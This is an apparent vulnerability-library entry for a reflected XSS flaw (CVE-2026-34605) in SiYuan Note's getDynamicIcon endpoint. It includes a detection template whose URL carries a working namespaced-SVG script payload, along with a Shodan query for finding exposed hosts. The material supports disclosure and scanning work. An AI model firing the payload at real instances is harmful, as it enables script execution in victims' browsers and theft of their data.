/Vulnerability Library

SiYuan Note - Cross-Site Scripting

CVE-2026-34605
Verified

Description

SiYuan Note through version 3.6.1 is vulnerable to unauthenticated reflected Cross-Site Scripting (XSS) in the `/api/icon/getDynamicIcon` endpoint due to improper filtering of SVG elements with a namespace prefix (such as `<x:script>`). By using a namespaced script element, attackers can bypass the `SanitizeSVG` function and execute arbitrary JavaScript in the victim’s browser upon visiting a crafted link.

Severity

Medium

CVSS Score

6.1

Exploit Probability

0%

Affected Product

siyuan

Published Date

March 31, 2026

Template Author

ritikchaddha

CVE-2026-34605.yaml
id: CVE-2026-34605

info:
  name: SiYuan Note - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    SiYuan Note through version 3.6.1 is vulnerable to unauthenticated reflected Cross-Site Scripting (XSS) in the `/api/icon/getDynamicIcon` endpoint due to improper filtering of SVG elements with a namespace prefix (such as `<x:script>`). By using a namespaced script element, attackers can bypass the `SanitizeSVG` function and execute arbitrary JavaScript in the victim’s browser upon visiting a crafted link.
  remediation: |
    Upgrade to SiYuan Note version 3.6.2 or later, where the namespace prefix is stripped prior to sanitization, blocking this form of XSS.
  impact: |
    Exploitation allows attackers to execute JavaScript in the context of the SiYuan Note instance, enabling unauthorized access to sensitive data, API calls with the victim's privileges, and potential data extraction or modification, if the victim is an authenticated user.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-73g7-86qr-jrg3
    - https://nvd.nist.gov/vuln/detail/CVE-2026-34605
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-34605
    epss-score: 0.00469
    epss-percentile: 0.37283
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: siyuan-note
    product: siyuan
    shodan-query: http.favicon.hash:-1450125239
  tags: cve,cve2026,siyuan,xss,svg

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/icon/getDynamicIcon?type=8&color=red&content=%3C%2Ftext%3E%3Cx%3Ascript%20xmlns%3Ax%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3Ealert%28document.domain%29%3C%2Fx%3Ascript%3E%3Ctext%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</text><x:script xmlns:x="http://www.w3.org/2000/svg">alert(document.domain)</x:script><text>'
          - 'id="dynamic_icon_type8'
        condition: and

      - type: word
        part: content_type
        words:
          - "image/svg+xml"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dcb78d8973c9bcb347311c20837ad5f17fa21eee5c9a12e04731ca2dfdebe768022100ec04e70fff6603c64ff6000fac55ddb3ff31d020cd0303f81cb7ca20fda553bc:922c64590222798bb761d5b6d8e72950
6.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2026-34605
CWE ID:
cwe-79

References

https://github.com/siyuan-note/siyuan/security/advisories/GHSA-73g7-86qr-jrg3https://nvd.nist.gov/vuln/detail/CVE-2026-34605

Remediation Steps

Upgrade to SiYuan Note version 3.6.2 or later, where the namespace prefix is stripped prior to sanitization, blocking this form of XSS.